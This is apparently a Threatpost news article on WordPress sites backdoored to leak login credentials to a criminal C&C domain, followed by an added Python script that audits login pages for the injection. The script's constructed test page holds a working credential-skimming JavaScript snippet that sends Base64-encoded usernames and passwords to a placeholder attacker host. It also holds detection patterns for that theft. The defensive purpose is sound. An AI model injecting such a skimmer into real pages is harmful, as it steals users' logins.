
WP Sites Backdoored, Leaking Credentials

by Michael Mimoso

WordPress site administrators just cannot come up for air.

With a raft of WordPress vulnerabilities—most of them in plugins—to address, now comes word that a number of sites running the content management system have been compromised and are sending credentials via a backdoor to a criminal group.

Researchers at Zscaler on Thursday said that the backdoor code implanted on the sites awakens when a user inputs login credentials.

“The credentials are encoded and sent to an attacker website in the form of a GET request,” said researchers Sameer Patil and Deepen Desai.

Zscaler said it has identified one command and control domain, conyouse[.]com, where the credentials are being sent. The researchers also released a partial list of compromised WordPress sites:

shoneekapoor[.]com
dwaynefrancis[.]com
blissfields[.]co[.]uk
avalineholding[.]com
attherighttime[.]net
bolsaemprego[.]ne
capitaltrill[.]com
blowdrybar[.]es
espada[.]co[.]uk
technograte[.]com
socalhistory[.]org
glasgowcontemporarychoir[.]com
sombornefp[.]co[.]uk
reciclaconloscincosentidos[.]com
testrmb[.]com
digivelum[.]com
laflordelys[.]com

“When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page,” Patil and Desai wrote. The malicious JavaScript is hosted on the C&C site, the researchers added, and is present in a file called wp.js.

“The form containing the username and password input box has a fixed name as ‘loginform’ in all WordPress sites,” the researchers said. “The preventDefault event method is used to cancel the submit event for ‘loginform’ entity and execute the alternate code which is present in this file. The login credential string is serialized and encoded in a Base64 format.”
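The description above gives a site owner enough to write a quick integrity check: a clean wp-login.php loads scripts only from its own host, and nothing on it hooks the ‘loginform’ submit event. The script below is an added example, not code from Zscaler or Threatpost; it audits the HTML of a login page for the three indicators the researchers describe (an off-site script, a script file named wp.js, and an inline handler that calls preventDefault on loginform). The sample pages and the attacker.example hostname are constructed for the demonstration; the real C&C domain named in the article is not used.

```python
"""Audit a WordPress login page for the credential-stealing injection
described by Zscaler: off-site wp.js plus a submit hook on 'loginform'.
Added example, not the researchers' own tooling."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the article: the hook targets the fixed form name
# 'loginform', cancels the real submit with preventDefault, and Base64-
# encodes the credentials (btoa in browser JavaScript) before the GET.
SUSPICIOUS_INLINE = ("loginform", "preventDefault", "btoa(")


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_login_page(html, site_host):
    """Return a list of findings for the login page HTML; empty means clean.

    site_host is the hostname the site itself is served from; any <script src>
    pointing at a different host is reported, as is any script named wp.js and
    any inline script that hooks the loginform submit with preventDefault.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        parsed = urlparse(src)  # handles absolute and protocol-relative URLs
        if parsed.hostname and parsed.hostname.lower() != site_host.lower():
            findings.append(f"off-site script: {src}")
        if parsed.path.rsplit("/", 1)[-1] == "wp.js":
            findings.append(f"script named wp.js: {src}")
    for code in parser.inline:
        hits = [k for k in SUSPICIOUS_INLINE if k in code]
        if "loginform" in hits and "preventDefault" in hits:
            findings.append("inline script hooks loginform submit: " + ", ".join(hits))
    return findings


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><body>
<form name="loginform" id="loginform" action="https://example.com/wp-login.php" method="post">
<input name="log"><input name="pwd"><input type="submit"></form>
<script src="https://example.com/wp-includes/js/jquery/jquery.js"></script>
</body></html>"""

# Same page with the injection pattern the article describes: an off-site
# wp.js and a handler that cancels the submit and beacons the Base64 string
# in a GET request. attacker.example is a placeholder hostname.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="//attacker.example/wp.js"></script>\n'
    '<script>document.forms.loginform.addEventListener("submit", function (e) {'
    ' e.preventDefault();'
    ' new Image().src = "//attacker.example/?q=" + btoa(e.target.log.value + ":" + e.target.pwd.value);'
    ' });</script></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, audit_login_page(page, "example.com") or "no findings")
```

Run it against the saved source of your own wp-login.php (for example, from `curl -s https://yoursite/wp-login.php`) with your site's hostname as the second argument. A legitimate page may load scripts from a CDN you control, so treat an off-site finding as something to verify rather than proof of compromise; the loginform/preventDefault combination in an inline script, however, is the specific behavior the researchers describe and deserves immediate attention.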

Continue reading on Threatpost.